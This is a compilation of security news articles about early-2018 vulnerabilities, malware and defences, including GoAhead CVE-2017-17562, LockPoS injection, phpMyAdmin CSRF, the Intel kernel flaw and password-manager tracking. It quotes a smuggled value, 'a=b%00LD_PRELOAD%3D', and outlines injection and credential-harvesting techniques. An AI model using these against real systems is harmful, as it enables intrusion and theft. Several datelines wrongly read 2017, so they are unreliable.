GoAhead is a small web server employed by numerous companies, including IBM, HP, Oracle, Boeing, D-link, and Motorola, is “deployed in hundreds of millions of devices and is ideal for the smallest of embedded devices,” according to EmbedThis, its developer.

The web server is currently present on over 700,000 Internet-connected devices out there, a Shodan search has revealed.

However, not all of these devices are impacted by said remote code execution vulnerability. Tracked as CVE-2017-17562, the vulnerability is triggered only in special conditions and affects only devices with servers running *nix that also have CGI support enabled with dynamically linked executables (CGI scripts).

Discovered by Elttam security researchers, the flaw is the “result of initializing the environment of forked CGI scripts using untrusted HTTP request parameters.” If the aforementioned conditions are met, the behavior can be abused for remote code execution when combined with the glibc dynamic linker, using special variables such as LD_PRELOAD.

The security researchers discovered that the issue affects all versions of the GoAhead source since at least 2.5.0, with the optional CGI support enabled.

The bug resides in the cgiHandler function, “which starts by allocating an array of pointers for the envp argument of the new process, followed by initializing it with the key-value pairs taken from HTTP request parameters. Finally, the launchCgi function is called which forks and execve’s the CGI script,” Elttam explains.

While REMOTE_HOST and HTTP_AUTHORIZATION are filtered, the remaining parameters are considered trusted and are passed along unfiltered. Thus, an attacker can control arbitrary environment variables used in a new CGI process.

To resolve the issue, EmbedThis introduced a skip for special parameter names and a prefix of all other parameters with a static string. This patch should resolve the issue even when parameters of the form a=b%00LD_PRELOAD%3D are used, Elttam says.

The issue, the researchers say, could exist in other services as well, not only in GoAhead web servers compiled with CGI support enabled.

“Although the CGI handling code remained relatively stable in all versions of the web server (which made it the ideal target), there has been a significant amount of code churn over the years in other modules. It’s possible there are other interesting vulnerabilities [in the web server],” Elttam concludes.


DMARC Implemented on Half of U.S. Government Domains
4.1.2018 securityweek Safety
Government agencies in the United States have made progress in the implementation of the DMARC standard in response to a Department of Homeland Security (DHS) directive, but the first deadline is less than two weeks away.

The Binding Operational Directive (BOD) 18-01 issued by the DHS in mid-October instructs all federal agencies to start using web and email security technologies such as HTTPS, STARTTLS and DMARC.

DMARC (Domain-based Message Authentication, Reporting and Conformance) is an email authentication, policy, and reporting protocol designed to detect and prevent email spoofing. Organizations can set the DMARC policy to “none” in order to only monitor unauthenticated emails, “quarantine” to send them to the spam or junk folder, or “reject” to completely block their delivery.

The DHS has ordered government agencies to implement DMARC with at least a “none” policy by January 15. Organizations will then need to set their DMARC policy to “reject” within one year.

A few days after the DHS made the announcement, security firm Agari checked over 1,000 domains owned by federal agencies and found that only 18% had implemented DMARC. By mid-November it increased to 34% and in December it reached 47%.

However, only 16% of them had deployed “quarantine” or “reject” policies by December, an increase of two percentage points compared to the previous month.

DMARC%20adoption%20in%20US%20government

More than 20 agencies have fully implemented DMARC, including the Federal Communications Commission (FCC), the Federal Trade Commission (FTC), the Senate, the Postal Service, the Department of Health and Human Services (HHS), and Department of Veterans Affairs.

The HHS has deployed DMARC across more than 100 of its domains, including ones used by Healthcare.gov, the National Institutes of Health (NIH), and the Centers for Disease Control and Prevention (CDC).

Agari said the overall email attack rate for government customers that had implemented DMARC dropped to less than one percent.

“Deploying a DMARC policy where p=none is simple, but it is only the first step,” Agari said in a report published on Tuesday. “To fully protect against phishing threats against both the federal government and the public at large (and maintain strong email governance), federal agencies must ultimately move to Quarantine and Reject policies.”


LockPoS Adopts New Injection Technique
4.1.2018 securityweek
Virus
The LockPoS Point-of-Sale (PoS) malware has been leveraging a new code injection technique to compromise systems, Cyberbit researchers say.

First detailed in July this year, LockPoS steals credit card data from the memory of computers attached to PoS credit card scanners. The malware was designed to read the memory of running processes and collect credit card data that is then sent to its command and control (C&C) server.

Previous analysis revealed that the threat used a dropper that injects it directly into the explorer.exe process. After execution, the dropper extracts a resource file from itself and injects various components that load the final LockPoS payload.

The malware is now employing an injection method that appears to be a new variant of a technique previously employed by the Flokibot PoS malware. With LockPoS distributed from the Flokibot botnet, and with the two threats sharing similarities, this doesn’t come as a surprise.

One of the injection techniques employed by LockPoS involves creating a section object in the kernel, calling a function to map a view of that section into another process, then copying code into the section and creating a remote thread to execute the mapped code, Cyberbit says.

LockPoS was observed using 3 main routines to inject code into a remote process, namely NtCreateSection, NtMapViewOfSection, and NtCreateThreadEx, all three exported from ntdll.dll, a core Dynamic-link library (DLL) file in the Windows operating system.

Instead of calling said routines, the malware maps ntdll.dll from the disk to its own virtual address space, which allows it to maintain a “clean” copy of the DLL file. LockPoS also allocates a buffer for saving the system calls number, copies malicious code to the shared mapped section, then creates a remote thread in explorer.exe to execute its malicious code.

By using this “silent” malware injection method, the malware can avoid any hooks that anti-malware software might have installed on ntdll.dll, thus increasing the chances of a successful attack.

“This new malware injection technique suggests a new trend could be developing of using old sequences in a new way that makes detection difficult,” Hod Gavriel, malware analyst at Cyberbit, explains.

While most endpoint detection and response (EDR) and next-gen antivirus products already monitor the Windows functions in user mode, kernel functions can’t be monitored in Windows 10, where the kernel space is still guarded. To ensure successful detection, improved memory analysis should be employed, the researcher says.


VMware Patches Critical Flaws in vSphere Data Protection
3.1.2017 securityweek
Vulnerebility
VMware has patched three critical vulnerabilities in vSphere Data Protection (VDP), including arbitrary file upload, authentication bypass and path traversal issues.

vSphere Data Protection is a backup and recovery solution for vSphere environments. The product is no longer offered by VMware since April 2017, but the company will continue to provide general support for version 6.x until 2020 and technical guidance until 2022.

VMware published a security advisory on Tuesday to inform VDP customers that critical vulnerabilities have been found in versions 5.x, 6.0.x and 6.1.x of the product. VMware has not credited anyone for discovering the weaknesses.

One of the flaws, tracked as CVE-2017-15548, allows an unauthenticated attacker to remotely bypass authentication and gain root access to a vulnerable system. Another bug, identified as CVE-2017-15549, allows a remote attacker with access to a low-privileged account to upload malicious files to any location on the server file system.

The last vulnerability is a path traversal tracked as CVE-2017-15550. It allows an authenticated attacker with low privileges to access arbitrary files on the server in the context of the vulnerable application.

The security holes have been patched with the release of VDP 6.1.6 and 6.0.7. Users of version 5.x have been advised to update to version 6.0.7 or newer.

This is only the third security advisory published by VMware for VDP. Another advisory was released last year to alert users of critical Java deserialization and credentials encryption issues, and one was published in late 2016 for an SSH key-based authentication flaw.


Mitigations Prepared for Critical Vulnerability in Intel CPUs
3.1.2017 securityweek
Vulnerebility
Researchers have apparently discovered a serious vulnerability affecting all Intel CPUs. Software-level mitigations have already been developed, but they could cause significant performance penalties.

Details of the vulnerability are expected to become available on January 9. The impact of the flaw is comparable to the notorious Heartbleed bug, but an attack is said to be more practical.

The existence of the security hole came to light following the introduction of kernel page table isolation (KPTI) in Linux. A similar feature is being implemented by Microsoft in Windows and Apple is also expected to make some changes in macOS. Experts believe it will not be easy for Intel to address the problem directly in its processors.

Vulnerability Impacts Intel ChipsKPTI is a hardening technique designed to improve security by isolating the kernel space from user space memory. It’s based on the KAISER system developed last year by a team of researchers at the Graz University of Technology in Austria. KAISER brings improvements to address space layout randomization (ASLR), a mitigation designed to prevent control-flow hijacking and code injection attacks.

Back in July 2017, researcher Anders Fogh shared some thoughts on how it may be possible to read kernel memory from an unprivileged process via speculative execution. While his attempts were unsuccessful, his work did yield some results. Some believe that researchers at Graz University – Fogh has previously collaborated with Graz University researchers on memory-related attacks – may have found a way to make it work.

Gaining access to the kernel space poses serious risks as this memory can include highly sensitive information.

AMD says its processors are not vulnerable to the type of attacks mitigated by KPTI, but the company does mention speculative execution.

“The AMD microarchitecture does not allow memory references, including speculative references, that access higher privileged data when running in a lesser privileged mode when that access would result in a page fault,” an AMD representative explained.

Cloud services from Microsoft, Amazon and Google are apparently impacted by the Intel hardware vulnerability - Amazon Web Services (AWS) and Microsoft Azure have informed customers of upcoming security updates that will require a reboot of their cloud instances. A developer who writes on the blog Python Sweetness speculated that the flaw could allow privilege escalation attacks against hypervisors.

As for the impact of the KPTI mitigation on performance, tests conducted by Grsecurity showed an impact of up to 35%, but it depends a great deal on what type of operations are being carried out. Tests done by Phoronix showed that gaming performance on Linux does not appear to be affected by the PTI changes in the kernel.

“Performance penalties from single to double digits are expected on patched kernels,” explained Michael Larabel, founder of Phoronix. “The penalty depends upon how much interaction the application/workload deals with the kernel if there's a lot of context switching and other activity. If it's a simple user-space application not doing much, the x86 PTI additions shouldn't cause much of an impact. Newer Intel CPUs with PCID should also help in ensuring less of a performance impact.”

The developers of the KAISER system claimed that the method has a negative impact of only 0.28%.


Intel Makes a Mistake in The CPU Design, Windows and Linux Scramble to Fix It
3.1.2017 securityaffairs
Vulnerebility

Intel Makes a Mistake in The CPU Design, Windows and Linux Scramble to Fix It. It is suspected that the flaw is in the way an Intel CPU manages memory between “kernel mode” and “user mode.”
Competition between IT hardware manufacturers is fierce. Decimal point differences in performance specs translate into millions of dollars won or lost with every chip release. Manufacturers are very creative at finding ways to gain an edge over their competition, and sometimes the creativity works against them. This appears to be the case with Intel’s CPUs, and in the worst case, it affects anyone who relies on Intel chips for virtualization — most companies, and cloud providers like Microsoft Azure, Amazon EC2, Google Compute Engine. It is up to operating system manufacturers to fix the problem and the fix will hurt performance.

Details of the security vulnerability are under embargo from Intel in an attempt to give developers time to come up with a fix so much of the reporting on the bug is extrapolated from online discussions and by dissecting the Linux patches that were quickly rolled out in December.

It is suspected that the flaw is in the way an Intel CPU manages memory between “kernel mode” and “user mode.” Think of all the programs running on a computer at the same time. For security and stability reasons we want to be sure that one program doesn’t negatively impact another program. For example, if your browser crashes you don’t want it to take down the entire computer by crashing the OS.

In a virtualized cloud environment, you don’t want someone else’s program to be able to see the details of what you are running in your portion of the cloud. To accomplish this isolation, individual programs are run in their own “user space.” However, these programs are still sharing hardware like network connections and hard drives so there is another layer required. Kernel mode coordinates requests for shared hardware and still maintain isolation between the various user mode programs. When microseconds can impact your performance metrics, the “cost” of loading kernel mode to execute the request, then unloading kernel mode, and returning to user mode is “expensive.” As described in The Register article, Intel attempted a shortcut “To make the transition from user mode to kernel mode and back to user mode as fast and efficient as possible, the kernel is present in all processes’ virtual memory address spaces, although it is invisible to these programs. When the kernel is needed, the program makes a system call, the processor switches to kernel mode and enters the kernel. When it is done, the CPU is told to switch back to user mode, and re-enter the process.”

intel%20chip

Although memory for each user process is well isolated, it is believed that the Intel flaw allows for these user processes to exploit kernel memory space to violate the intended isolation.

Many operating systems utilize a security control called Kernel Address Space Layout Randomization (KASLR) which is supposed to address risks of a user process gaining access to kernel memory space (Daniel López Azaña has a good summary of ASLR, KASLR and KARL here.) However, in October 2017 the Linux core kernel developers released the KAISER patch series which hinted at the current Intel CPU issue, detailed in the LWN article, “KAISER: hiding the kernel from user space.” Then in December, a number of Linux distributions released kernel updates which included Kernel Page-Table Isolation (PTI) significantly restricting memory space available to running processes. On December 26, 2017, Intel’s competitor AMD sent this email to the Linux kernel mailing list:

"AMD processors are not subject to the types of attacks that the kernel
page table isolation feature protects against. The AMD microarchitecture
does not allow memory references, including speculative references, that
access higher privileged data when running in a lesser privileged mode
when that access would result in a page fault."
All of this activity seems to point squarely at a problem in the way that Intel CPUs isolate, or fail to isolate, kernel memory from user processes. But while under the embargo it is all educated guessing.

Major Linux distributions have released kernel updates to address the issue and Microsoft is expected to release corresponding patches in January’s patch bundle. There are rumors that Microsoft Azure and Amazon Web Services customers have been notified directly of impending maintenance outages this month which might be associated with patches for this Intel bug. Since the kernel mode shortcut was intended to improve CPU performance, you should expect that the fix will negatively impact current performance. We will have to wait for the Intel information embargo to be lifted, and for the Linux and Windows patches to be applied to truly understand the risks and performance impacts.


Marketing companies have started exploiting a flaw in browsers’ built-in password managers to track users
3.1.2017 securityaffairs
Vulnerebility

A group of researchers discovered marketing companies have started exploiting an 11-year-old vulnerability in browsers’ built-in password managers to track visitors.
A group of researchers from Princeton’s Center for Information Technology Policy has discovered that at least two marketing companies, AdThink and OnAudience, that are exploiting an 11-year-old vulnerability in major browsers to track visitors.

The researchers discovered that the marketing firms have started exploiting the flaw in browsers’ built-in password managers that allow them to secretly steal email address. The gathered data allow them to target advertising across different browsers and devices.

password-manager%20tracking

Of course, the same flaw could be exploited by threat actors to steal saved login credential from browsers without requiring users interaction.
Every browser (i.e. Google Chrome, Mozilla Firefox, Microsoft Edge, and Opera) implements a built-in password manager tool that allows users to save login information for automatic form-filling.

The researchers from Princeton’s Center for Information Technology Policy discovered that both AdThink and OnAudience are exploiting the built-in password managers to track visitors of around 1,110 of the Alexa top 1 million sites across the Internet.

“We found two scripts using this technique to extract email addresses from login managers on the websites which embed them. These addresses are then hashed and sent to one or more third-party servers. These scripts were present on 1110 of the Alexa top 1 million sites.” states the analysis of the Princeton’s Center for Information Technology Policy.

The experts have found third-party tracking scripts on these websites that inject invisible login forms in the background of the webpage, the password managers are tricked into auto-filling the form using these data.

The scripts detect the username and send it to third-party servers after hashing with MD5, SHA1, and SHA256 algorithms, these hashed values are used as an identifier for a specific user. Typically tracker used the hashed email as user’s ID.

“Login form autofilling in general doesn’t require user interaction; all of the major browsers will autofill the username (often an email address) immediately, regardless of the visibility of the form.” continue the researchers.

“Chrome doesn’t autofill the password field until the user clicks or touches anywhere on the page. Other browsers we tested don’t require user interaction to autofill password fields.”

browser%20password-manager%20tracking

“Email addresses are unique and persistent, and thus the hash of an email address is an excellent tracking identifier,” the researchers said. “A user’s email address will almost never change—clearing cookies, using private browsing mode, or switching devices won’t prevent tracking.”
Third-party password managers like LastPass and 1Password are not exposed to this tracking technique because they avoid auto-filling invisible forms and anyway they require user interaction.

Users can test the tracking technique using a live demo page created by the researchers.

Below the list of sites embedding scripts that abuse login manager for tracking, it also includes the website of the founder of M5S Beppe Grillo (beppegrillo.it).


Necurs botnet involved in massive ransomware campaigns at the end of 2017
3.1.2017 securityaffairs
Ransomware

The Necurs botnet made the headlines at year-end sending out tens of millions of spam emails daily as part of massive ransomware campaigns.
Necurs was not active for a long period at the beginning of 2017 and resumed it activity in April.

The Necurs botnet was used in the past months to push many other malware, including Locky, Jaff, GlobeImposter, Dridex , Scarab and the Trickbot.

According to data collected by the experts at AppRiver, between December 19 and December 29, 2017, the Necurs botnet was involved in the distribution of ransomware. Crooks use typical holiday-themed scam emails to distribute both Locky and GlobeImposter, malicious messages used .vbs (Visual Basic Script) or .js (JavaScript) files inside a .7z archive.

necurs%20botnet%20xmas%201220_js_eml

Starting on Dec. 19, the Necurs botnet was observed sending tens of millions of spam emails daily to distribute ransomware, the peak was reached on December 20th with over 47 million email (peaking at 5.7 million per hour).

“On Dec. 19, AppRiver’s filters stopped 45,976,814 malicious emails sent by the Necurs botnet. Maximum traffic for it was a just more than 4.6 million emails per hour. These were all .7z that contained malicious .vbs files leading to an infection.” reads the analysis published by AppRiver.

Necurs%20botnet%20xmas

Experts noticed that during the first day operators only used vbs files inside the .7z archive, while the second day they started using also .js files.

“On Dec. 21 and 22, the traffic switched back over to the .js files and began to taper off. We saw 36,290,981 and 29,602,971 messages blocked respectively, for those two days, before the botnet went quiet from Dec. 23-25. Today (Dec. 26), Necurs re-awoke from its slumber for a couple hours then went quiet again.” continues the analysis.

“Hard to say why, however, I would hypothesize the operators may have been testing or monitoring the rate of infections and realized many workers are on vacation. As of the time this blog was authored we’ve captured the below statistics for today”

The activity of the botnet increased again on Dec. 28-29, on the first day it peaked 6.5 million messages early morning, on the next day, the Necurs botnet sent out nearly 59 million ransomware messages.


Critical Flaw Reported In phpMyAdmin Lets Attackers Damage Databases
3.1.2017 thehackernews 
Vulnerebility
A critical security vulnerability has been reported in phpMyAdmin—one of the most popular applications for managing the MySQL database—which could allow remote attackers to perform dangerous database operations just by tricking administrators into clicking a link.
Discovered by an Indian security researcher, Ashutosh Barot, the vulnerability is a cross-site request forgery (CSRF) attack and affects phpMyAdmin versions 4.7.x (prior to 4.7.7).
Cross-site request forgery vulnerability, also known as XSRF, is an attack wherein an attacker tricks an authenticated user into executing an unwanted action.
According to an advisory released by phpMyAdmin, "by deceiving a user to click on a crafted URL, it is possible to perform harmful database operations such as deleting records, dropping/truncating tables, etc."
phpMyAdmin is a free and open source administration tool for MySQL and MariaDB and is widely used to manage the database for websites created with WordPress, Joomla, and many other content management platforms.
Moreover, a lot of hosting providers use phpMyAdmin to offer their customers a convenient way to organize their databases.

Barot has also released a video, as shown above, demonstrating how a remote attacker can make database admins unknowingly delete (DROP) an entire table from the database just by tricking them into clicking a specially crafted link.
"A feature of phpMyAdmin was using a GET request and after that POST request for Database operations such as DROP TABLE table_name; GET requests must be protected against CSRF attacks. In this case, POST requests were used which were sent through URL (for bookmarking purpose may be); it was possible for an attacker to trick a database admin into clicking a button and perform a drop table database query of the attacker’s choice." Barot explains in a blog post.
However, performing this attack is not simple as it may sound. To prepare a CSRF attack URL, the attacker should be aware of the name of targeted database and table.
"If a user executes a query on the database by clicking insert, DROP, etc. buttons, the URL will contain database name and table name," Barot says. "This vulnerability can result in the disclosure of sensitive information as the URL is stored at various places such as browser history, SIEM logs, Firewall Logs, ISP Logs, etc."
Barot reported the vulnerability to phpMyAdmin developers, who confirmed his finding and released phpMyAdmin 4.7.7 to address this issue. So administrators are highly recommended to update their installations as soon as possible.


15-Year-Old Apple macOS 0-Day Kernel Flaw Disclosed, Allows Root Access
3.1.2017 thehackernews  Apple

A security researcher on New Year's eve made public the details of an unpatched security vulnerability in Apple's macOS operating system that can be exploited to take complete control of a system.
On the first day of 2018, a researcher using the online moniker Siguza released the details of the unpatched zero-day macOS vulnerability, which he suggests is at least 15 years old, and proof-of-concept (PoC) exploit code on GitHub.
The bug is a serious local privilege escalation (LPE) vulnerability that could enable an unprivileged user (attacker) to gain root access on the targeted system and execute malicious code. Malware designed to exploit this flaw could fully install itself deep within the system.
From looking at the source, Siguza believes this vulnerability has been around since at least 2002, but some clues suggest the flaw could actually be ten years older than that. "One tiny, ugly bug. Fifteen years. Full system compromise," he wrote.
This local privilege escalation flaw resides in IOHIDFamily, an extension of the macOS kernel which has been designed for human interface devices (HID), like a touchscreen or buttons, allowing an attacker to install a root shell or execute arbitrary code on the system.
"IOHIDFamily has been notorious in the past for the many race conditions it contained, which ultimately lead to large parts of it being rewritten to make use of command gates, as well as large parts being locked down by means of entitlements," the researcher explains.
"I was originally looking through its source in the hope of finding a low-hanging fruit that would let me compromise an iOS kernel, but what I didn’t know it then is that some parts of IOHIDFamily exist only on macOS - specifically IOHIDSystem, which contains the vulnerability."
The exploit created by Siguza, which he dubbed IOHIDeous, affects all versions of macOS and enables arbitrary read/write bug in the kernel.
Besides this, IOHIDeous also disables the System Integrity Protection (SIP) and Apple Mobile File Integrity (AMFI) security features that offer protection against malware.
The PoC code made available by Siguza has for some reason stopped working on macOS High Sierra 10.13.2 and works on macOS High Sierra 10.13.1 and earlier, but he believes the exploit code can be tweaked to work on the latest version as well.
However, the researcher pointed out that for his exploit to work, it needs to force a log out of the logged-in user, but this can be done by making the exploit work when the targeted machine is manually shut down or rebooted.
Since the vulnerability only affects macOS and is not remotely exploitable, the researcher decided to dumped his findings online instead of reporting it to Apple. For those unaware, Apple's bug bounty program does not cover macOS bugs.
For in-depth technical details about the vulnerability, you can head on to researcher's write-up on GitHub.


Flaw In Major Browsers Allows 3rd-Party Scripts to Steal Your Saved Passwords
3.1.2017 thehackernews 
Vulnerebility

Security researchers have uncovered how marketing companies have started exploiting an 11-year-old bug in browsers' built-in password managers, which allow them to secretly steal your email address for targeted advertising across different browsers and devices.
The major concern is that the same loophole could allow malicious actors to steal your saved usernames and passwords from browsers without requiring your interaction.
Every modern browser—Google Chrome, Mozilla Firefox, Opera or Microsoft Edge—today comes with a built-in easy-to-use password manager tool that allows you to save your login information for automatic form-filling.
These browser-based password managers are designed for convenience, as they automatically detect login form on a webpage and fill-in the saved credentials accordingly.
However, a team of researchers from Princeton's Center for Information Technology Policy has discovered that at least two marketing companies, AdThink and OnAudience, are actively exploiting such built-in password managers to track visitors of around 1,110 of the Alexa top 1 million sites across the Internet.
Third-party tracking scripts found by researchers on these websites inject invisible login forms in the background of the webpage, tricking browser-based password managers into auto-filling the form using the saved user's information.
"Login form auto filling in general doesn't require user interaction; all of the major browsers will autofill the username (often an email address) immediately, regardless of the visibility of the form," the researchers say.
"Chrome doesn't autofill the password field until the user clicks or touches anywhere on the page. Other browsers we tested don't require user interaction to autofill password fields."

Since these scripts are primarily designed for user-tracking, they detect the username and send it to third-party servers after hashing with MD5, SHA1 and SHA256 algorithms, which could then be used as a persistent ID for a specific user to track him/her from page to page.
"Email addresses are unique and persistent, and thus the hash of an email address is an excellent tracking identifier," the researchers said. "A user's email address will almost never change—clearing cookies, using private browsing mode, or switching devices won't prevent tracking."
Although the researchers have spotted marketing firms scooping up your usernames using such tracking scripts, there is no technical measure to prevent these scripts from collecting your passwords the same way.
However, most third-party password managers, like LastPass and 1Password, are not prone to this attack, since they avoid auto-filling invisible forms and require user interaction as well.
Researchers have also created a demo page, where you can test if your browser's password manager also leaks your username and password to invisible forms.
The simplest way to prevent such attacks is to disable the autofill function on your browser.


Many GPS Tracking Services Expose User Location, Other Data
3.1.2017 securityweek Privacy
Researchers discovered that many online services designed for managing location tracking devices are affected by vulnerabilities that expose potentially sensitive information.

Fitness, child, pet and vehicle trackers, and other devices that include GPS and GSM tracking capabilities are typically managed via specialized online services.

Security experts Vangelis Stykas and Michael Gruhn found that over 100 such services have flaws that can be exploited by malicious actors to gain access to device and personal data. The security holes, dubbed Trackmageddon, can expose information such as current location, location history, device model and type, serial number, and phone number.

Some services used by devices that have photo and audio recording capabilities also expose images and audio files. In some cases, it’s also possible to send commands to devices in order to activate or deactivate certain features, such as geofence alerts.

Attackers can gain access to information by exploiting default credentials (e.g. 123456), and insecure direct object reference (IDOR) flaws, which allow an authenticated user to access other users’ accounts simply by changing the value of a parameter in the URL. The services also expose information through directory listings, log files, source code, WSDL files, and publicly exposed API endpoints that allow unauthenticated access.

Stykas and Gruhn have notified a vast majority of the affected vendors in November and December. Nine services have confirmed patching the flaws or promised to implement fixes soon, and over a dozen websites appear to have addressed the vulnerabilities without informing the researchers. However, the rest of the tracking services remain vulnerable.

There are roughly 100 impacted domains, but some of them appear to be operated by the same company. Researchers have identified 36 unique IPs hosting these domains and 41 databases that they share. They estimate that these services expose data associated with over 6.3 million devices and more than 360 device models.

The vulnerable software appears to come from China-based ThinkRace, but in many cases the company does not have control over the servers hosting the tracking services.

Gruhn and Stykas pointed out that vulnerabilities in ThinkRace products – possibly including some of the issues disclosed now – were first discovered in 2015 by a New Zealand-based expert while analyzing car tracking and immobilisation devices that relied on ThinkRace software.

Users of the online tracking services that remain vulnerable have been advised to change their password and remove any potentially sensitive information stored in their account. However, these are only partial solutions to the problem and researchers have advised people to simply stop using affected devices until patches are rolled out.


Critical Vulnerability Patched in phpMyAdmin
3.1.2017 securityweek
Vulnerebility
An update released just before the holidays by the developers of phpMyAdmin patches a serious vulnerability that can be exploited to perform harmful database operations by getting targeted administrators to click on specially crafted links.

phpMyAdmin is a free and open source tool designed for managing MySQL databases over the Internet. With more than 200,000 downloads every month, phpMyAdmin is one of the top MySQL database administration tools.

India-based researcher Ashutosh Barot discovered that phpMyAdmin is affected by a cross-site request forgery (CSRF) flaw that can be exploited by an attacker to drop tables, delete records, and perform other database operations.

For the attack to work, an authenticated admin needs to click on a specially crafted URL. However, Barot noted that the attack works as long as the user is logged in to the cPanel web hosting administration interface, even if phpMyAdmin has been closed after use.

These types of attacks are possible due to the fact that vulnerable versions of phpMyAdmin use GET requests for database operations, but fail to provide CSRF protection.

The researcher also discovered that the URLs associated with database operations performed via phpMyAdmin are stored in the web browser history, which can pose security risks.

“The URL will contain database name and table name as a GET request was used to perform DB operations,” Barot said in a blog post published on Friday. “URLs are stored at various places such as browser history, SIEM logs, firewall logs, ISP logs, etc. This URL is always visible at client side, it can be a serious issue if you are not using SSL (some information about your previous queries were stored in someone’s logs!). Wherever the URL is being saved, an adversary can gain some information about your database.”

phpMyAdmin developers fixed the CSRF vulnerability found by Barot with the release of version 4.7.7. All prior 4.7.x versions are impacted by the security hole, which phpMyAdmin has classified as “critical.” Users have been advised to update their installations or apply the available patch.


Necurs Botnet Fuels Massive Year-End Ransomware Attacks
3.1.2017 securityweek
Ransomware
The Necurs botnet started 2017 with a four-month vacation, but ended the year sending tens of millions of spam emails daily as part of massive ransomware distribution campaigns.

Considered the largest spam botnet at the moment, Necurs was the main driver behind the ascension of the Locky ransomware (which in turn is associated with the Dridex banking Trojan) in 2016. As Necurs took a long vacation in the beginning of 2017, Locky was silent as well, but both resumed activity in April.

Over the course of 2017, however, the botnet was involved in the distribution of the Jaff, GlobeImposter, and Scarab ransomware families, as well as in 'pump-and-dump' schemes.

Over a 10-day period between December 19 and December 29, 2017, Necurs was once again involved in the distribution of ransomware, in addition to sending typical holiday-themed scam emails, data collected by AppRiver reveals.

The messages, AppRiver says, were distributing the Locky and GlobeImposter ransomware families and revealed the attackers’ preference to use malicious .vbs (Visual Basic Script) or .js (JavaScript) files located inside a .7z archive.

Consisting of between 5 and 6 million infected hosts and keeping around 1 or 2 million of them active at any given time, Necurs provides operators with remote access to the infected machines and can be used for various malicious activities, including malware downloads.

Starting on Dec. 19, the botnet was observed sending tens of millions of spam emails daily to distribute ransomware. It started at nearly 46 million emails on the first day (peaking at over 4.6 million messages per hour) and continued with over 47 million messages on Dec. 20 (peaking at 5.7 million per hour).

While the initial spam featured mainly .vbs files inside the .7z archive, .js files started appearing as well on the second day, and the traffic switched to .js files on Dec. 21-22, when it also started to taper off, at 36 million and 29 million messages per day, respectively. The botnet remained quiet from Dec. 23-25 and recommenced activity for only a couple of hours on Dec. 26.

“Hard to say why, however, I would hypothesize the operators may have been testing or monitoring the rate of infections and realized many workers are on vacation,” AppRiver’s David Pickett notes.

On Dec. 28-29, however, the botnet was highly active. It peaked at 6.5 million messages early morning on Dec. 28, but wasn’t active for long. On the next day, Necurs was observed sending nearly 59 million ransomware messages.

The malicious emails, the security researchers reveal, were masquerading as purchase orders and voicemails, but also claimed to contain images of interest to the intended victims.


Internet-connected Sonos Speakers Leak User Information
3.1.2017 securityweek
Vulnerebility
A vulnerability found in Internet-connected Sonos Play:1 speakers can be abused to access information on users, Trend Micro has discovered.

By exploiting the issue, an attacker could learn a user’s musical preferences, get hold of their email address, and could even learn where the user lives and whether they are at home. Additionally, an attacker could play a recorded message on the device and trick the target into downloading malware.

While analyzing the device, Trend Micro’s researchers discovered the device had only three ports open and that Sonos applications on it were pointed to a specific website, while most of the communications were performed over port TCP/1400.

Looking at the specific URI path of /status on the device, the researchers also noticed that many of its subpages were shown via a simple website. Thus, no authentication was required to access information about the tracks being played or the music libraries the device knows about.

Furthermore, the website revealed personal information such as emails associated with audio streaming services and exposed various debug functions, including “the ability to traceroute, ping, and even make an mDNS announcement via a simple website,” the researchers say. The status page can reveal other information as well.

“Let’s say an attacker knows the target uses a Sonos device. The attacker can then take the information collected here to tailor better attacks against the target. This could include mobile devices, printers, and even types of computers on the networks,” Trend Micro notes in a technical analysis (PDF).

The security researchers also discovered a series of plausible attack scenarios that could be used not only against home users, but also to target enterprise networks.

By learning the user’s musical preferences, an attacker could craft phishing emails and deliver them to the target. In a workplace environment, such an attack could be used to discover other IoT devices connected to the same network and find vulnerabilities on them to further compromise the network.

Using a website that compounds multiple sources of Wi-Fi geolocation an attacker could also find where the user lives (the researchers determined the device location by looking at the wireless access points (WAPs) the device tried to access during installation) and whether they are at home by monitoring when the speaker is activated and deactivated.

“This hybrid attack involving cyber and physical elements presents new dangers that home and enterprise users should be aware of. Devices leaking presence data not only make users easier to predict — they can also put the user at physical risk,” the researchers say.

Leveraging information discovered on the aforementioned status page, including model numbers and serial numbers, an attacker could disrupt the device and even play a crafted status message containing misleading information.

The attacker could also send tailored emails to the user (to the addresses tied to accounts on music streaming applications) and trick them into downloading malware masquerading as a software update. Using other discoverable information on the target, the attacker could add personalized information to the message to make it even more convincing.

With the help of search service Shodan, the security researchers were able to find roughly 5,000 Sonos devices exposed to the Internet. The manufacturer was informed on the findings and has already released and updated to address the discovered bugs, but some of the issues continue to impact users, Trend Micro says.

“The problem of unsecured internet-connected devices is not limited to home users but also extends to workplace environments when seemingly safe IoT devices are introduced into the company network, as was shown in the attack scenarios. Whether these devices are installed to improve productivity or are simply brought to work by employees, the risk of having an exposed and unsecured device should not be taken lightly,” Trend Micro concludes.


Former NSA hacker reversed Kaspersky Lab antivirus to compose signatures capable of detecting classified documents
2.1.2017 securityaffairs BigBrothers

Former NSA hacker, demonstrated how to subvert the Kaspersky Lab antivirus and turn it into a powerful search tool for classified documents.
The Kaspersky case demonstrated that security software can be exploited by intelligence agencies as a powerful spy tool.

Patrick Wardle, chief research officer at Digita Security and former NSA hacker, demonstrated it by subverting the Kaspersky Lab antivirus and turning it into a powerful search tool for classified documents.

“In the battle against malicious code, antivirus products are a staple,” Patrick Wardle told the New York Times. “Ironically, though, these products share many characteristics with the advanced cyberespionage collection implants they seek to detect.”

“I wanted to know if this was a feasible attack mechanism,” Mr. Wardle added. “I didn’t want to get into the complex accusations. But from a technical point of view, if an antivirus maker wanted to, was coerced to, or was hacked or somehow subverted, could it create a signature to flag classified documents?”

In December, US President Donald Trump signed a bill that bans the use of Kaspersky Lab products and services in federal agencies.

According to a draft of a top-secret report leaked by Edward J. Snowden, the NSA at least since 2008 was targeting antivirus software (i.e. Checkpoint and Avast) to collect sensitive information stored in the target machines.

Mr. Wardle conducted a reverse-engineering of Kaspersky Lab antivirus software to explore the possibility to abuse it for intelligence purposes. The expert’s goal was to compose a signature that is able to detect classified documents.

Mr. Wardle discovered that the code incredibly complex, unlike traditional antivirus software, Kaspersky’s malware signatures are easily updated. This feature can be tweaked to automatically scan the victim’s machine and steal classified documents.

“Modern anti-virus products are incredibly complex pieces of software and Kaspersky is likely one of the most complex. Thus, merely gaining a reasonable understanding of its signatures and scanning logic is a challenging task.” wrote Wardle.

“Though the installer ships with built-in signatures, as is the case with any anti-virus program, Kaspersky’s anti-virus engine regularly checks for, and automatically installs any new signatures” “When new signatures are available, they are downloaded by the kav daemon from Kaspersky’s update servers”

